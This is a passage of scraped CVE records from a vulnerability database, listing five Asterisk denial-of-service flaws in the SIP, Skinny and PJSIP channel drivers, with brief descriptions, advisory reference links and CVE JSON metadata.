	http://secunia.com/advisories/47273	third-party-advisory, x_refsource_SECUNIA
	http://osvdb.org/77598	vdb-entry, x_refsource_OSVDB
	http://downloads.asterisk.org/pub/security/AST-2011-014.html	x_refsource_CONFIRM
	http://www.debian.org/security/2011/dsa-2367	vendor-advisory, x_refsource_DEBIAN

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T00:09:19.356Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "[oss-security] 20111209 Re: CVE Request -- Asterisk -- AST-2011-013 and AST-2011-014",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://openwall.com/lists/oss-security/2011/12/09/4"
          },
          {
            "name": "[oss-security] 20111209 CVE Request -- Asterisk -- AST-2011-013 and AST-2011-014",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://openwall.com/lists/oss-security/2011/12/09/3"
          },
          {
            "name": "47273",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/47273"
          },
          {
            "name": "77598",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/77598"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-014.html"
          },
          {
            "name": "DSA-2367",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2011/dsa-2367"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-12-08T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The handle_request_info function in channels/chan_sip.c in Asterisk Open Source 1.6.2.x before 1.6.2.21 and 1.8.x before 1.8.7.2, when automon is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted sequence of SIP requests."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2012-09-01T09:00:00",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "name": "[oss-security] 20111209 Re: CVE Request -- Asterisk -- AST-2011-013 and AST-2011-014",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://openwall.com/lists/oss-security/2011/12/09/4"
        },
        {
          "name": "[oss-security] 20111209 CVE Request -- Asterisk -- AST-2011-013 and AST-2011-014",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://openwall.com/lists/oss-security/2011/12/09/3"
        },
        {
          "name": "47273",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/47273"
        },
        {
          "name": "77598",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/77598"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-014.html"
        },
        {
          "name": "DSA-2367",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2011/dsa-2367"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2011-4598",
    "datePublished": "2011-12-15T02:00:00",
    "dateReserved": "2011-11-29T00:00:00",
    "dateUpdated": "2024-08-07T00:09:19.356Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2007-1306

Vulnerability from cvelistv5

Published

2007-03-07 00:00

Modified

2024-08-07 12:50

Severity ?

Summary

Asterisk 1.4 before 1.4.1 and 1.2 before 1.2.16 allows remote attackers to cause a denial of service (crash) by sending a Session Initiation Protocol (SIP) packet without a URI and SIP-version header, which results in a NULL pointer dereference.

References

▼	URL	Tags
	http://www.vupen.com/english/advisories/2007/0830	vdb-entry, x_refsource_VUPEN
	http://www.securityfocus.com/bid/22838	vdb-entry, x_refsource_BID
	http://www.osvdb.org/33888	vdb-entry, x_refsource_OSVDB
	http://secunia.com/advisories/24578	third-party-advisory, x_refsource_SECUNIA
	http://asterisk.org/node/48319	x_refsource_CONFIRM
	http://www.novell.com/linux/security/advisories/2007_34_asterisk.html	vendor-advisory, x_refsource_SUSE
	http://labs.musecurity.com/advisories/MU-200703-01.txt	x_refsource_MISC
	http://asterisk.org/node/48320	x_refsource_CONFIRM
	http://secunia.com/advisories/24380	third-party-advisory, x_refsource_SECUNIA
	https://exchange.xforce.ibmcloud.com/vulnerabilities/32830	vdb-entry, x_refsource_XF
	http://security.gentoo.org/glsa/glsa-200703-14.xml	vendor-advisory, x_refsource_GENTOO
	http://secunia.com/advisories/25582	third-party-advisory, x_refsource_SECUNIA
	http://www.securitytracker.com/id?1017723	vdb-entry, x_refsource_SECTRACK
	http://www.kb.cert.org/vuls/id/228032	third-party-advisory, x_refsource_CERT-VN
	http://www.debian.org/security/2007/dsa-1358	vendor-advisory, x_refsource_DEBIAN

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T12:50:35.142Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "ADV-2007-0830",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2007/0830"
          },
          {
            "name": "22838",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/22838"
          },
          {
            "name": "33888",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/33888"
          },
          {
            "name": "24578",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/24578"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://asterisk.org/node/48319"
          },
          {
            "name": "SUSE-SA:2007:034",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://www.novell.com/linux/security/advisories/2007_34_asterisk.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://labs.musecurity.com/advisories/MU-200703-01.txt"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://asterisk.org/node/48320"
          },
          {
            "name": "24380",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/24380"
          },
          {
            "name": "asterisk-sip-channeldriver-dos(32830)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/32830"
          },
          {
            "name": "GLSA-200703-14",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://security.gentoo.org/glsa/glsa-200703-14.xml"
          },
          {
            "name": "25582",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/25582"
          },
          {
            "name": "1017723",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1017723"
          },
          {
            "name": "VU#228032",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/228032"
          },
          {
            "name": "DSA-1358",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2007/dsa-1358"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-03-05T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk 1.4 before 1.4.1 and 1.2 before 1.2.16 allows remote attackers to cause a denial of service (crash) by sending a Session Initiation Protocol (SIP) packet without a URI and SIP-version header, which results in a NULL pointer dereference."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-28T12:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "ADV-2007-0830",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2007/0830"
        },
        {
          "name": "22838",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/22838"
        },
        {
          "name": "33888",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/33888"
        },
        {
          "name": "24578",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/24578"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://asterisk.org/node/48319"
        },
        {
          "name": "SUSE-SA:2007:034",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://www.novell.com/linux/security/advisories/2007_34_asterisk.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://labs.musecurity.com/advisories/MU-200703-01.txt"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://asterisk.org/node/48320"
        },
        {
          "name": "24380",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/24380"
        },
        {
          "name": "asterisk-sip-channeldriver-dos(32830)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/32830"
        },
        {
          "name": "GLSA-200703-14",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://security.gentoo.org/glsa/glsa-200703-14.xml"
        },
        {
          "name": "25582",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/25582"
        },
        {
          "name": "1017723",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1017723"
        },
        {
          "name": "VU#228032",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/228032"
        },
        {
          "name": "DSA-1358",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2007/dsa-1358"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-1306",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Asterisk 1.4 before 1.4.1 and 1.2 before 1.2.16 allows remote attackers to cause a denial of service (crash) by sending a Session Initiation Protocol (SIP) packet without a URI and SIP-version header, which results in a NULL pointer dereference."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "ADV-2007-0830",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2007/0830"
            },
            {
              "name": "22838",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/22838"
            },
            {
              "name": "33888",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/33888"
            },
            {
              "name": "24578",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/24578"
            },
            {
              "name": "http://asterisk.org/node/48319",
              "refsource": "CONFIRM",
              "url": "http://asterisk.org/node/48319"
            },
            {
              "name": "SUSE-SA:2007:034",
              "refsource": "SUSE",
              "url": "http://www.novell.com/linux/security/advisories/2007_34_asterisk.html"
            },
            {
              "name": "http://labs.musecurity.com/advisories/MU-200703-01.txt",
              "refsource": "MISC",
              "url": "http://labs.musecurity.com/advisories/MU-200703-01.txt"
            },
            {
              "name": "http://asterisk.org/node/48320",
              "refsource": "CONFIRM",
              "url": "http://asterisk.org/node/48320"
            },
            {
              "name": "24380",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/24380"
            },
            {
              "name": "asterisk-sip-channeldriver-dos(32830)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/32830"
            },
            {
              "name": "GLSA-200703-14",
              "refsource": "GENTOO",
              "url": "http://security.gentoo.org/glsa/glsa-200703-14.xml"
            },
            {
              "name": "25582",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/25582"
            },
            {
              "name": "1017723",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1017723"
            },
            {
              "name": "VU#228032",
              "refsource": "CERT-VN",
              "url": "http://www.kb.cert.org/vuls/id/228032"
            },
            {
              "name": "DSA-1358",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2007/dsa-1358"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-1306",
    "datePublished": "2007-03-07T00:00:00",
    "dateReserved": "2007-03-06T00:00:00",
    "dateUpdated": "2024-08-07T12:50:35.142Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2012-3553

Vulnerability from cvelistv5

Published

2012-06-19 20:00

Modified

2024-09-17 04:25

Severity ?

Summary

chan_skinny.c in the Skinny (aka SCCP) channel driver in Asterisk Open Source 10.x before 10.5.1 allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) by sending a Station Key Pad Button message and closing a connection in off-hook mode, a related issue to CVE-2012-2948.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2012-009.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T20:13:50.590Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2012-009.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "chan_skinny.c in the Skinny (aka SCCP) channel driver in Asterisk Open Source 10.x before 10.5.1 allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) by sending a Station Key Pad Button message and closing a connection in off-hook mode, a related issue to CVE-2012-2948."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2012-06-19T20:00:00Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2012-009.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-3553",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "chan_skinny.c in the Skinny (aka SCCP) channel driver in Asterisk Open Source 10.x before 10.5.1 allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) by sending a Station Key Pad Button message and closing a connection in off-hook mode, a related issue to CVE-2012-2948."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2012-009.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2012-009.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-3553",
    "datePublished": "2012-06-19T20:00:00Z",
    "dateReserved": "2012-06-14T00:00:00Z",
    "dateUpdated": "2024-09-17T04:25:46.308Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2015-1558

Vulnerability from cvelistv5

Published

2015-02-09 11:00

Modified

2024-08-06 04:47

Severity ?

Summary

Asterisk Open Source 12.x before 12.8.1 and 13.x before 13.1.1, when using the PJSIP channel driver, does not properly reclaim RTP ports, which allows remote authenticated users to cause a denial of service (file descriptor consumption) via an SDP offer containing only incompatible codecs.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2015-001.html	x_refsource_CONFIRM
	http://www.securitytracker.com/id/1031661	vdb-entry, x_refsource_SECTRACK
	http://seclists.org/fulldisclosure/2015/Jan/116	mailing-list, x_refsource_FULLDISC
	http://www.securityfocus.com/archive/1/534573/100/0/threaded	mailing-list, x_refsource_BUGTRAQ

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T04:47:17.146Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2015-001.html"
          },
          {
            "name": "1031661",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1031661"
          },
          {
            "name": "20150128 AST-2015-001: File descriptor leak when incompatible codecs are offered",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2015/Jan/116"
          },
          {
            "name": "20150128 AST-2015-001: File descriptor leak when incompatible codecs are offered",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/534573/100/0/threaded"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2015-01-28T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk Open Source 12.x before 12.8.1 and 13.x before 13.1.1, when using the PJSIP channel driver, does not properly reclaim RTP ports, which allows remote authenticated users to cause a denial of service (file descriptor consumption) via an SDP offer containing only incompatible codecs."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-09T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2015-001.html"
        },
        {
          "name": "1031661",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1031661"
        },
        {
          "name": "20150128 AST-2015-001: File descriptor leak when incompatible codecs are offered",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2015/Jan/116"
        },
        {
          "name": "20150128 AST-2015-001: File descriptor leak when incompatible codecs are offered",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/534573/100/0/threaded"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2015-1558",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Asterisk Open Source 12.x before 12.8.1 and 13.x before 13.1.1, when using the PJSIP channel driver, does not properly reclaim RTP ports, which allows remote authenticated users to cause a denial of service (file descriptor consumption) via an SDP offer containing only incompatible codecs."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2015-001.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2015-001.html"
            },
            {
              "name": "1031661",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1031661"
            },
            {
              "name": "20150128 AST-2015-001: File descriptor leak when incompatible codecs are offered",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2015/Jan/116"
            },
            {
              "name": "20150128 AST-2015-001: File descriptor leak when incompatible codecs are offered",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/534573/100/0/threaded"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2015-1558",
    "datePublished": "2015-02-09T11:00:00",
    "dateReserved": "2015-02-08T00:00:00",
    "dateUpdated": "2024-08-06T04:47:17.146Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2011-2665

Vulnerability from cvelistv5

Published

2011-07-06 19:00

Modified

2024-08-06 23:08

Severity ?

Summary

reqresp_parser.c in the SIP channel driver in Asterisk Open Source 1.8.x before 1.8.4.3 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a SIP packet with a Contact header that lacks a < (less than) character.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2011-009.html	x_refsource_CONFIRM
	http://secunia.com/advisories/45239	third-party-advisory, x_refsource_SECUNIA
	http://www.debian.org/security/2011/dsa-2276	vendor-advisory, x_refsource_DEBIAN
	http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html	vendor-advisory, x_refsource_FEDORA
	http://downloads.asterisk.org/pub/security/AST-2011-009-1.8.diff	x_refsource_CONFIRM
	http://secunia.com/advisories/45048	third-party-advisory, x_refsource_SECUNIA
	http://secunia.com/advisories/45201	third-party-advisory, x_refsource_SECUNIA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T23:08:23.768Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-009.html"
          },
          {
            "name": "45239",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/45239"
          },
          {
            "name": "DSA-2276",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2011/dsa-2276"
          },
          {
            "name": "FEDORA-2011-8914",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2011-009-1.8.diff"
          },
          {
            "name": "45048",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/45048"
          },
          {
            "name": "45201",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/45201"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-06-23T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "reqresp_parser.c in the SIP channel driver in Asterisk Open Source 1.8.x before 1.8.4.3 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a SIP packet with a Contact header that lacks a \u003c (less than) character."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2011-09-07T09:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-009.html"
        },
        {
          "name": "45239",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/45239"
        },
        {
          "name": "DSA-2276",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2011/dsa-2276"
        },
        {
          "name": "FEDORA-2011-8914",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2011-009-1.8.diff"
        },
        {
          "name": "45048",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/45048"
        },
        {
          "name": "45201",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/45201"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2011-2665",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "reqresp_parser.c in the SIP channel driver in Asterisk Open Source 1.8.x before 1.8.4.3 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a SIP packet with a Contact header that lacks a \u003c (less than) character."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2011-009.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2011-009.html"
            },
            {
              "name": "45239",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/45239"
            },
            {
              "name": "DSA-2276",
              "refsource": "DEBIAN",
